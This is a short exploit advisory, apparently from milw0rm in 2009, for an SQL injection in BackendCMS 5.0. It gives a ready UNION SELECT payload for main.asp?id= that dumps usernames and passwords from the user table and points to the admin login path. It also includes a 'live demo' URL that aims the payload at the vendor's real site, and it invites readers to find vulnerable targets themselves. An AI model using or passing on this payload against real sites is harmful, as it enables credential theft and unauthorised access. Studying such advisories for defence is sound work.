29 lines
No EOL
1.3 KiB
Text
29 lines
No EOL
1.3 KiB
Text
************************************************************
|
|
** BackendCMS Version 5.0 SQl Injection
|
|
************************************************************
|
|
** Prodcut: BackendCMS Version 5.0
|
|
** Home : http://www.backendcms.dk/
|
|
** Vunlerability : SQL Injection
|
|
** Dork : find it yourself
|
|
**
|
|
************************************************************
|
|
** Discovred by: AnGeL25dZ
|
|
** Contact : angel25dz@gmail.com
|
|
** *********************************************************
|
|
** Greetz to : ALLAH
|
|
** All Members of HackTeach
|
|
** All Members of http://islam-attack.com
|
|
** ra3ch and all my friends ...MOC
|
|
**
|
|
*************************************************************
|
|
******************** SQL Injection **************************
|
|
*************************************************************
|
|
** Exploit: http://[PATH]/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
|
|
**
|
|
** Administration Login : http://[path]/admin/
|
|
** PS: the number of columns can be different from one site to another
|
|
**
|
|
****************************************************************
|
|
** Live demo : http://www.backendcms.dk/main.asp?id=-1+union+all+select+1,2,brugernavn,4,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19+from+user
|
|
|
|
# milw0rm.com [2009-04-09] |